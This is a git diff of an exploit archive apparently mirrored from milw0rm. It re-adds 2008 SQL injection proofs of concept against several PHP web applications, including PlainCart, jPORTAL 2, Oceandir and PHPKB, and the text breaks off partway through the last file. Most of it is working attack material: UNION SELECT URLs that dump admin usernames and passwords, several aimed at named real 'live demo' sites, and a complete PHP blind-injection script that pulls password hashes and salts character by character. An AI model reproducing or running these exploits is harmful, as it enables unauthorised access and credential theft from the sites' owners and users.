+# 
+# Author: r45c4l 
+# 
+# Home  : www.darkc0de.com 
+# 
+# Email : r45c4l@hotmail.com 
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Title:  PlainCart (index.php) SQL Inj
+#
+# Script Download: http://www.phpwebcommerce.com/shopping-cart-source-code.php
+# 
+#
+###########################################################
+#
+# d0rk: n/a
+#
+###########################################################
+ 
+     POC 1:- 
+
+         http://www.site.com/[script]/index.php?c=16&p=-3+UNION+SELECT+user_name,user_password,3,4,5+from+tbl_user--
+	
+     
+     
+     
+     Live Demo: 
+	
+	http://www.phpwebcommerce.com/plaincart/index.php?c=16&p=-3+UNION+SELECT+user_name,user_password,3,4,5+from+tbl_user--
+
+ 
+    Admin panel: www.site.com/plaincart/admin/login.php
+ 
+###########################################################
+#
+#  Bug discovered : 20 Sep.2008
+###########################################################
+
+# milw0rm.com [2008-09-20]
diff --git a/platforms/php/webapps/6504.txt b/platforms/php/webapps/6504.txt
index 83847ccc8..e5298b468 100755
--- a/platforms/php/webapps/6504.txt
+++ b/platforms/php/webapps/6504.txt
@@ -1,25 +1,25 @@
-/**
- * @title Oceandir <= 2.9 (show_vote.php id) Remote SQL injection
- * @author JEEN HACKER TEAM [ Jeen + Secertry ]
- * @cost 250$ 
- * @script http://www.oceandir.com
- * @copyright 2008
- * @homepage http://www.hackteach.org/cc/teach.php
- * @email SVN@HOTMAIL.COM , CPY@HOTMAIL.COM
- */
-
-Exploit :
-~user
-http://www.site.com/dir/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users
-~passwd
-http://www.site.com/dir/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users
-
-Example :
-####
-http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users
-http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users
-####
-
-Greetz : www.hackteach.org user's
-
-# milw0rm.com [2008-09-20]
+/**
+ * @title Oceandir <= 2.9 (show_vote.php id) Remote SQL injection
+ * @author JEEN HACKER TEAM [ Jeen + Secertry ]
+ * @cost 250$ 
+ * @script http://www.oceandir.com
+ * @copyright 2008
+ * @homepage http://www.hackteach.org/cc/teach.php
+ * @email SVN@HOTMAIL.COM , CPY@HOTMAIL.COM
+ */
+
+Exploit :
+~user
+http://www.site.com/dir/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users
+~passwd
+http://www.site.com/dir/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users
+
+Example :
+####
+http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users
+http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users
+####
+
+Greetz : www.hackteach.org user's
+
+# milw0rm.com [2008-09-20]
diff --git a/platforms/php/webapps/6505.txt b/platforms/php/webapps/6505.txt
index 3abf90123..35299a6a4 100755
--- a/platforms/php/webapps/6505.txt
+++ b/platforms/php/webapps/6505.txt
@@ -1,64 +1,64 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
-#-QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE-DON-Outlawz        #
-#                   and all darkc0de members                ---# 
-################################################################ 
-# 
-# Author: r45c4l 
-# 
-# Home  : www.darkc0de.com 
-# 
-# Email : r45c4l@hotmail.com 
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Title:  jPORTAL 2 (humor.php) SQL Injection
-#
-# VEndor: http://jportal2.com/
-# 
-#
-###########################################################
-#
-# d0rk: intext:"jPORTAL 2" & inurl:"humor.php"
-#
-###########################################################
- 
-     POC 1:- 
-
-        http://www.site.com/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+jp2admins--
-	
-    POC 2:- 
-
-	http://www.site.com/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+admins--
-
-  Table names may vary from jp2admins to admins 
-     
-     
-     Live Demo: 
-	
-	http://www.domanski.pl/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+jp2admins--
-
-	http://gimnazjum.webd.pl/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+admins--
- 
-    Admin panel: www.site.com/admin.php
- 
-###########################################################
-#
-#  Bug discovered : 21 Sep.2008
-###########################################################
-
-# milw0rm.com [2008-09-20]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
+#-QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE-DON-Outlawz        #
+#                   and all darkc0de members                ---# 
+################################################################ 
+# 
+# Author: r45c4l 
+# 
+# Home  : www.darkc0de.com 
+# 
+# Email : r45c4l@hotmail.com 
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Title:  jPORTAL 2 (humor.php) SQL Injection
+#
+# VEndor: http://jportal2.com/
+# 
+#
+###########################################################
+#
+# d0rk: intext:"jPORTAL 2" & inurl:"humor.php"
+#
+###########################################################
+ 
+     POC 1:- 
+
+        http://www.site.com/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+jp2admins--
+	
+    POC 2:- 
+
+	http://www.site.com/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+admins--
+
+  Table names may vary from jp2admins to admins 
+     
+     
+     Live Demo: 
+	
+	http://www.domanski.pl/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+jp2admins--
+
+	http://gimnazjum.webd.pl/humor.php?id=-1+union+all+select+1,concat(nick,0x3a,pass),3,4,5,6,7,8,9,10+from+admins--
+ 
+    Admin panel: www.site.com/admin.php
+ 
+###########################################################
+#
+#  Bug discovered : 21 Sep.2008
+###########################################################
+
+# milw0rm.com [2008-09-20]
diff --git a/platforms/php/webapps/6507.php b/platforms/php/webapps/6507.php
index 0e7ad8880..e518a471d 100755
--- a/platforms/php/webapps/6507.php
+++ b/platforms/php/webapps/6507.php
@@ -1,400 +1,400 @@
-Attention!\n";
-		echo "

    \n";
-		echo "
    Warning!
    \n";
-		echo "This exploit is meant to be used as php CLI script!
    \n";
-		echo "More information:
    \n";
-		echo "    http://www.google.com/search?hl=en&q=php+cli+windows
    \n";
-		echo "Still, you can try to run it from webserver.
    \n";
-		echo "Just press the button below and prepare for long waiting
    \n";
-		echo "And learn to use php CLI next time, please ...
    \n";
-		echo "\n";
-		echo "\n";
-		echo "\n";
-		echo "
    \n";
-		exit;
-	}
-	else
-	{
-		// Let's try to maximize our chances without CLI
-		@set_time_limit(0);
-	}
-}
-//=====================================================================
-xecho("Target: $url\n");
-xecho("Sql table prefix: $prefix\n");
-xecho("Testing target URL ... \n");
-test_target_url();
-xecho("Target URL seems to be valid\n");
-xecho("Testing target ID ... \n");
-test_target_id();
-xecho("Target ID seems to be valid\n");
-
-$hash = get_hash();
-$salt = get_salt();
-
-add_line("Target: $url");
-add_line("User ID: $id");
-add_line("Hash: $hash");
-add_line("Salt: $salt");
-add_line("------------------------------------------");
-
-xecho("\n------------------------------------------\n");
-xecho("Hash: $hash\n");
-xecho("Salt: $salt");
-xecho("\n------------------------------------------\n");
-
-xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");
-die("See ya! :) \n");
-//////////////////////////////////////////////////////////////////////
-//////////////////////////////////////////////////////////////////////
-function test_target_url()
-{
-	global $url;
-	
-	$post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
-	$buff = trim(make_post($url, $post, '', $url));
-	if($buff !== 'found')
-	{
-		die('Invalid response, target URL not valid? Exiting ...');
-	}
-}
-//////////////////////////////////////////////////////////////////////
-function test_target_id()
-{
-	global $url, $prefix, $id;
-	
-	$post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';
-	if(!test_condition($post))
-	{
-		die('Invalid response, target ID not valid? Exiting ...');
-	}
-}
-///////////////////////////////////////////////////////////////////////
-function get_salt()
-{
-	$len = 5;
-	$out = '';
-	
-	xecho("Finding salt ...\n");
-	
-	for($i = 1; $i < $len + 1; $i ++)
-	{
-		$ch = get_saltchar($i);
-		xecho("Got pos $i --> $ch\n");
-		$out .= "$ch";
-		xecho("Current salt: $out \n");
-	}
-	
-	xecho("\nFinal salt: $out\n\n");
-	
-	return $out;
-}
-///////////////////////////////////////////////////////////////////////
-function get_saltchar($pos)
-{
-	global $prefix, $id;
-
-	$char = '';
-	$min = 32;
-	$max = 128;
-	$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";
-	$curr = 0;
-	
-	while(1)
-	{
-		$area = $max - $min;
-		if($area < 2 )
-		{
-			$post = $pattern . "=$max";
-			$eq = test_condition($post);
-			
-			if($eq)
-			{
-				$char = chr($max);
-			}
-			else
-			{
-				$char = chr($min);
-			}
-			
-			break;
-		}
-		
-		$half = intval(floor($area / 2));
-		$curr = $min + $half;
-		
-		$post = $pattern . '%253e' . $curr;
-		
-		$bigger = test_condition($post);
-		
-		if($bigger)
-		{
-			$min = $curr;
-		}
-		else
-		{
-			$max = $curr;
-		}
-
-		xecho("Current test: $curr-$max-$min\n");
-	}
-	
-	return $char;
-}
-///////////////////////////////////////////////////////////////////////
-function get_hash()
-{
-	$len = 32;
-	$out = '';
-	
-	xecho("Finding hash ...\n");
-	
-	for($i = 1; $i < $len + 1; $i ++)
-	{
-		$ch = get_hashchar($i);
-		xecho("Got pos $i --> $ch\n");
-		$out .= "$ch";
-		xecho("Current hash: $out \n");
-	}
-	
-	xecho("\nFinal hash: $out\n\n");
-	
-	return $out;
-}
-///////////////////////////////////////////////////////////////////////
-function get_hashchar($pos)
-{
-	global $prefix, $id;
-
-	$char = '';
-	$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";
-
-	// First let's determine, if it's number or letter
-	$post = $pattern . '%253e57';
-	$letter = test_condition($post);
-	
-	if($letter)
-	{
-		$min = 97;
-		$max = 102;
-		xecho("Char to find is [a-f]\n");
-	}
-	else
-	{
-		$min = 48;
-		$max = 57;
-		xecho("Char to find is [0-9]\n");
-	}
-
-	$curr = 0;
-	
-	while(1)
-	{
-		$area = $max - $min;
-		if($area < 2 )
-		{
-			$post = $pattern . "=$max";
-			$eq = test_condition($post);
-			
-			if($eq)
-			{
-				$char = chr($max);
-			}
-			else
-			{
-				$char = chr($min);
-			}
-			
-			break;
-		}
-		
-		$half = intval(floor($area / 2));
-		$curr = $min + $half;
-		
-		$post = $pattern . '%253e' . $curr;
-		
-		$bigger = test_condition($post);
-		
-		if($bigger)
-		{
-			$min = $curr;
-		}
-		else
-		{
-			$max = $curr;
-		}
-
-		xecho("Current test: $curr-$max-$min\n");
-	}
-	
-	return $char;
-}
-///////////////////////////////////////////////////////////////////////
-function test_condition($p)
-{
-	global $url;
-	
-	$bret = false;
-	$maxtry = 10;
-	$try = 1;
-		
-	$pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
-	$post = sprintf($pattern, $p);
-	
-	while(1)
-	{
-		$buff = trim(make_post($url, $post, '', $url));
-
-		if($buff === 'found')
-		{
-			$bret = true;
-			break;
-		}
-		elseif($buff === 'notfound')
-		{
-			break;
-		}
-		elseif(strpos($buff, 'IPS Driver Error') !== false)
-		{
-			die("Sql error! Wrong prefix?\nExiting ... ");
-		}
-		else
-		{
-			xecho("test_condition() - try $try - invalid return value ...\n");
-			$try ++;
-			if($try > $maxtry)
-			{
-				die("Too many tries - exiting ...\n");
-			}
-			else
-			{
-				xecho("Trying again - try $try ...\n");
-			}
-		}
-	}
-	
-	return $bret;
-}
-///////////////////////////////////////////////////////////////////////
-function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
-{
-	$ch = curl_init();
-	$timeout = 120;
-	curl_setopt ($ch, CURLOPT_URL, $url);
-	curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
-	curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
-	curl_setopt($ch, CURLOPT_POST, 1); 
-	curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); 
-	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
-	curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)');
-	
-	if(!empty($GLOBALS['proxy_ip_port']))
-	{
-		curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
-		
-		if(!empty($GLOBALS['proxy_user_password']))
-		{
-			curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']); 
-		}
-	}
-	
-	if(!empty($cookie))
-	{
-		curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
-	}
- 
-	if(!empty($referer))
-	{
-		curl_setopt ($ch, CURLOPT_REFERER, $referer);
-	}
-
-	if($headers === TRUE)
-	{
-		curl_setopt ($ch, CURLOPT_HEADER, TRUE);
-	}
-	else
-	{
-		curl_setopt ($ch, CURLOPT_HEADER, FALSE);
-	}
-
-	$fc = curl_exec($ch);
-	curl_close($ch);
-	
-	return $fc;
-}
-///////////////////////////////////////////////////////////////////////
-function add_line($line)
-{
-	global $outfile;
-	
-	$line .= "\n";
-	$fh = fopen($outfile, 'ab');
-	fwrite($fh, $line);
-	fclose($fh);
-	
-}
-///////////////////////////////////////////////////////////////////////
-function xecho($line)
-{
-	if($GLOBALS['cli'])
-	{
-		echo "$line";
-	}
-	else
-	{
-		$line = nl2br(htmlspecialchars($line));
-		echo "$line";
-	}
-}
-//////////////////////////////////////////////////////////////////////
-?>
-
-# milw0rm.com [2008-09-21]
+Attention!\n";
+		echo "

    \n";
+		echo "
    Warning!
    \n";
+		echo "This exploit is meant to be used as php CLI script!
    \n";
+		echo "More information:
    \n";
+		echo "http://www.google.com/search?hl=en&q=php+cli+windows
    \n";
+		echo "Still, you can try to run it from webserver.
    \n";
+		echo "Just press the button below and prepare for long waiting
    \n";
+		echo "And learn to use php CLI next time, please ...
    \n";
+		echo "
    \n";
+		echo "\n";
+		echo "\n";
+		echo "
    \n";
+		exit;
+	}
+	else
+	{
+		// Let's try to maximize our chances without CLI
+		@set_time_limit(0);
+	}
+}
+//=====================================================================
+xecho("Target: $url\n");
+xecho("Sql table prefix: $prefix\n");
+xecho("Testing target URL ... \n");
+test_target_url();
+xecho("Target URL seems to be valid\n");
+xecho("Testing target ID ... \n");
+test_target_id();
+xecho("Target ID seems to be valid\n");
+
+$hash = get_hash();
+$salt = get_salt();
+
+add_line("Target: $url");
+add_line("User ID: $id");
+add_line("Hash: $hash");
+add_line("Salt: $salt");
+add_line("------------------------------------------");
+
+xecho("\n------------------------------------------\n");
+xecho("Hash: $hash\n");
+xecho("Salt: $salt");
+xecho("\n------------------------------------------\n");
+
+xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");
+die("See ya! :) \n");
+//////////////////////////////////////////////////////////////////////
+//////////////////////////////////////////////////////////////////////
+function test_target_url()
+{
+	global $url;
+	
+	$post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
+	$buff = trim(make_post($url, $post, '', $url));
+	if($buff !== 'found')
+	{
+		die('Invalid response, target URL not valid? Exiting ...');
+	}
+}
+//////////////////////////////////////////////////////////////////////
+function test_target_id()
+{
+	global $url, $prefix, $id;
+	
+	$post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';
+	if(!test_condition($post))
+	{
+		die('Invalid response, target ID not valid? Exiting ...');
+	}
+}
+///////////////////////////////////////////////////////////////////////
+function get_salt()
+{
+	$len = 5;
+	$out = '';
+	
+	xecho("Finding salt ...\n");
+	
+	for($i = 1; $i < $len + 1; $i ++)
+	{
+		$ch = get_saltchar($i);
+		xecho("Got pos $i --> $ch\n");
+		$out .= "$ch";
+		xecho("Current salt: $out \n");
+	}
+	
+	xecho("\nFinal salt: $out\n\n");
+	
+	return $out;
+}
+///////////////////////////////////////////////////////////////////////
+function get_saltchar($pos)
+{
+	global $prefix, $id;
+
+	$char = '';
+	$min = 32;
+	$max = 128;
+	$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";
+	$curr = 0;
+	
+	while(1)
+	{
+		$area = $max - $min;
+		if($area < 2 )
+		{
+			$post = $pattern . "=$max";
+			$eq = test_condition($post);
+			
+			if($eq)
+			{
+				$char = chr($max);
+			}
+			else
+			{
+				$char = chr($min);
+			}
+			
+			break;
+		}
+		
+		$half = intval(floor($area / 2));
+		$curr = $min + $half;
+		
+		$post = $pattern . '%253e' . $curr;
+		
+		$bigger = test_condition($post);
+		
+		if($bigger)
+		{
+			$min = $curr;
+		}
+		else
+		{
+			$max = $curr;
+		}
+
+		xecho("Current test: $curr-$max-$min\n");
+	}
+	
+	return $char;
+}
+///////////////////////////////////////////////////////////////////////
+function get_hash()
+{
+	$len = 32;
+	$out = '';
+	
+	xecho("Finding hash ...\n");
+	
+	for($i = 1; $i < $len + 1; $i ++)
+	{
+		$ch = get_hashchar($i);
+		xecho("Got pos $i --> $ch\n");
+		$out .= "$ch";
+		xecho("Current hash: $out \n");
+	}
+	
+	xecho("\nFinal hash: $out\n\n");
+	
+	return $out;
+}
+///////////////////////////////////////////////////////////////////////
+function get_hashchar($pos)
+{
+	global $prefix, $id;
+
+	$char = '';
+	$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";
+
+	// First let's determine, if it's number or letter
+	$post = $pattern . '%253e57';
+	$letter = test_condition($post);
+	
+	if($letter)
+	{
+		$min = 97;
+		$max = 102;
+		xecho("Char to find is [a-f]\n");
+	}
+	else
+	{
+		$min = 48;
+		$max = 57;
+		xecho("Char to find is [0-9]\n");
+	}
+
+	$curr = 0;
+	
+	while(1)
+	{
+		$area = $max - $min;
+		if($area < 2 )
+		{
+			$post = $pattern . "=$max";
+			$eq = test_condition($post);
+			
+			if($eq)
+			{
+				$char = chr($max);
+			}
+			else
+			{
+				$char = chr($min);
+			}
+			
+			break;
+		}
+		
+		$half = intval(floor($area / 2));
+		$curr = $min + $half;
+		
+		$post = $pattern . '%253e' . $curr;
+		
+		$bigger = test_condition($post);
+		
+		if($bigger)
+		{
+			$min = $curr;
+		}
+		else
+		{
+			$max = $curr;
+		}
+
+		xecho("Current test: $curr-$max-$min\n");
+	}
+	
+	return $char;
+}
+///////////////////////////////////////////////////////////////////////
+function test_condition($p)
+{
+	global $url;
+	
+	$bret = false;
+	$maxtry = 10;
+	$try = 1;
+		
+	$pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
+	$post = sprintf($pattern, $p);
+	
+	while(1)
+	{
+		$buff = trim(make_post($url, $post, '', $url));
+
+		if($buff === 'found')
+		{
+			$bret = true;
+			break;
+		}
+		elseif($buff === 'notfound')
+		{
+			break;
+		}
+		elseif(strpos($buff, 'IPS Driver Error') !== false)
+		{
+			die("Sql error! Wrong prefix?\nExiting ... ");
+		}
+		else
+		{
+			xecho("test_condition() - try $try - invalid return value ...\n");
+			$try ++;
+			if($try > $maxtry)
+			{
+				die("Too many tries - exiting ...\n");
+			}
+			else
+			{
+				xecho("Trying again - try $try ...\n");
+			}
+		}
+	}
+	
+	return $bret;
+}
+///////////////////////////////////////////////////////////////////////
+function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
+{
+	$ch = curl_init();
+	$timeout = 120;
+	curl_setopt ($ch, CURLOPT_URL, $url);
+	curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
+	curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
+	curl_setopt($ch, CURLOPT_POST, 1); 
+	curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); 
+	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
+	curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)');
+	
+	if(!empty($GLOBALS['proxy_ip_port']))
+	{
+		curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
+		
+		if(!empty($GLOBALS['proxy_user_password']))
+		{
+			curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']); 
+		}
+	}
+	
+	if(!empty($cookie))
+	{
+		curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
+	}
+ 
+	if(!empty($referer))
+	{
+		curl_setopt ($ch, CURLOPT_REFERER, $referer);
+	}
+
+	if($headers === TRUE)
+	{
+		curl_setopt ($ch, CURLOPT_HEADER, TRUE);
+	}
+	else
+	{
+		curl_setopt ($ch, CURLOPT_HEADER, FALSE);
+	}
+
+	$fc = curl_exec($ch);
+	curl_close($ch);
+	
+	return $fc;
+}
+///////////////////////////////////////////////////////////////////////
+function add_line($line)
+{
+	global $outfile;
+	
+	$line .= "\n";
+	$fh = fopen($outfile, 'ab');
+	fwrite($fh, $line);
+	fclose($fh);
+	
+}
+///////////////////////////////////////////////////////////////////////
+function xecho($line)
+{
+	if($GLOBALS['cli'])
+	{
+		echo "$line";
+	}
+	else
+	{
+		$line = nl2br(htmlspecialchars($line));
+		echo "$line";
+	}
+}
+//////////////////////////////////////////////////////////////////////
+?>
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6508.txt b/platforms/php/webapps/6508.txt
index be7263b96..b87cbaeb9 100755
--- a/platforms/php/webapps/6508.txt
+++ b/platforms/php/webapps/6508.txt
@@ -1,33 +1,33 @@
-       _____          ____   _____
-      /  _  \ /\  /\ / _  \ /  _  \
-      | | | | \ \/ / ||_| | | | | |  
-      | | | |  \  /  \_   | | | | |  
-      | |_| |  /  \   __\ | | |_| |
-      \_____/ / /\ \ |____/ \_____/
-              \/  \/
-
-[~] Basic PHP Events Lister Remote SQL Injection
-
-[~] Author: 0x90
-
-[~] HomePage: www.0x90.com.ar
-
-[~] Contact: Guns[at]0x90[dot]com[dot]ar
-
-[~] Script: Basic PHP Events Lister
-
-[~] site: http://www.mevin.com
-
-[~] Donload: http://www.mevin.com/downloads/Basic-php-events-lister1.0.zip
-
-[~] Vulnerability Class: SQL Injection
-
-[~] Online Demostration: http://www.mevin.com/downloads/events/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--
-
-
-
-[~] Exploit:
-
-http://host/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--
-
-# milw0rm.com [2008-09-21]
+       _____          ____   _____
+      /  _  \ /\  /\ / _  \ /  _  \
+      | | | | \ \/ / ||_| | | | | |  
+      | | | |  \  /  \_   | | | | |  
+      | |_| |  /  \   __\ | | |_| |
+      \_____/ / /\ \ |____/ \_____/
+              \/  \/
+
+[~] Basic PHP Events Lister Remote SQL Injection
+
+[~] Author: 0x90
+
+[~] HomePage: www.0x90.com.ar
+
+[~] Contact: Guns[at]0x90[dot]com[dot]ar
+
+[~] Script: Basic PHP Events Lister
+
+[~] site: http://www.mevin.com
+
+[~] Donload: http://www.mevin.com/downloads/Basic-php-events-lister1.0.zip
+
+[~] Vulnerability Class: SQL Injection
+
+[~] Online Demostration: http://www.mevin.com/downloads/events/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--
+
+
+
+[~] Exploit:
+
+http://host/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--
+
+# milw0rm.com [2008-09-21]
diff --git a/platforms/php/webapps/6510.txt b/platforms/php/webapps/6510.txt
index b97449557..af4c54cf3 100755
--- a/platforms/php/webapps/6510.txt
+++ b/platforms/php/webapps/6510.txt
@@ -1,65 +1,65 @@
-[~] PHPKB Knowledge Base Software v1.5 Professional (email.php) - SQL Injection Vulnerability
-[~]
-[~] http://www.knowledgebase-script.com
-[~] ----------------------------------------------------------
-[~] Bug founded by d3v1l
-[~]
-[~] Date: 20.09.2007
-[~]
-[~]
-[~] d3v1l@spoofer.com
-[~]
-[~] -----------------------------------------------------------
-[~] Greetz tO:-
-[~] 
-[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
-[~] 
-[~] Pentest|Gibon|Pig
-[~]-------------------------------------------------------------
-[~] Exploit :-
-[~]
-[~] http://site.com/email.php?ID=SQL
-[~]   
-[~] Demo :-
-[~]
-[~]
-[~] http://xxxx.com/email.php?ID=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1/*
-[~]
-[~]----------------------------------------------------------------------------------------------------------------------
-
-2
-
-[~] PHPKB Knowledge Base Software v1.5 Professional (question.php) - SQL Injection Vulnerability
-[~]
-[~] http://www.knowledgebase-script.com
-[~] ----------------------------------------------------------
-[~] Bug founded by d3v1l
-[~]
-[~] Date: 20.09.2007
-[~]
-[~]
-[~] d3v1l@spoofer.com
-[~]
-[~] -----------------------------------------------------------
-[~] Greetz tO:-
-[~] 
-[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
-[~] 
-[~] Pentest|Gibon|Pig
-[~]-------------------------------------------------------------
-[~] Exploit :-
-[~]
-[~] http://site.com/question.php?ID=1 UNION SELECT concat_ws(0x3a,version(),database(),user())/*
-[~] http://site.com/question.php?ID=1 UNION SELECT concat(user,char(58),password) FROM mysql.user/*
-[~] 
-[~] If he does not work test yet -> /question.php?ID=-1
-[~] 
-[~] Demo :- 
-[~]
-[~] http://xxxx.com/kb/question.php?ID=1%20UNION%20SELECT%20concat(user,char(58),password)%20FROM%20mysql.user%20/*
-[~]
-[~] http://xxxx.com/kb/question.php?ID=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())/*
-[~]
-[~]----------------------------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-09-21]
+[~] PHPKB Knowledge Base Software v1.5 Professional (email.php) - SQL Injection Vulnerability
+[~]
+[~] http://www.knowledgebase-script.com
+[~] ----------------------------------------------------------
+[~] Bug founded by d3v1l
+[~]
+[~] Date: 20.09.2007
+[~]
+[~]
+[~] d3v1l@spoofer.com
+[~]
+[~] -----------------------------------------------------------
+[~] Greetz tO:-
+[~] 
+[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
+[~] 
+[~] Pentest|Gibon|Pig
+[~]-------------------------------------------------------------
+[~] Exploit :-
+[~]
+[~] http://site.com/email.php?ID=SQL
+[~]   
+[~] Demo :-
+[~]
+[~]
+[~] http://xxxx.com/email.php?ID=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1/*
+[~]
+[~]----------------------------------------------------------------------------------------------------------------------
+
+2
+
+[~] PHPKB Knowledge Base Software v1.5 Professional (question.php) - SQL Injection Vulnerability
+[~]
+[~] http://www.knowledgebase-script.com
+[~] ----------------------------------------------------------
+[~] Bug founded by d3v1l
+[~]
+[~] Date: 20.09.2007
+[~]
+[~]
+[~] d3v1l@spoofer.com
+[~]
+[~] -----------------------------------------------------------
+[~] Greetz tO:-
+[~] 
+[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
+[~] 
+[~] Pentest|Gibon|Pig
+[~]-------------------------------------------------------------
+[~] Exploit :-
+[~]
+[~] http://site.com/question.php?ID=1 UNION SELECT concat_ws(0x3a,version(),database(),user())/*
+[~] http://site.com/question.php?ID=1 UNION SELECT concat(user,char(58),password) FROM mysql.user/*
+[~] 
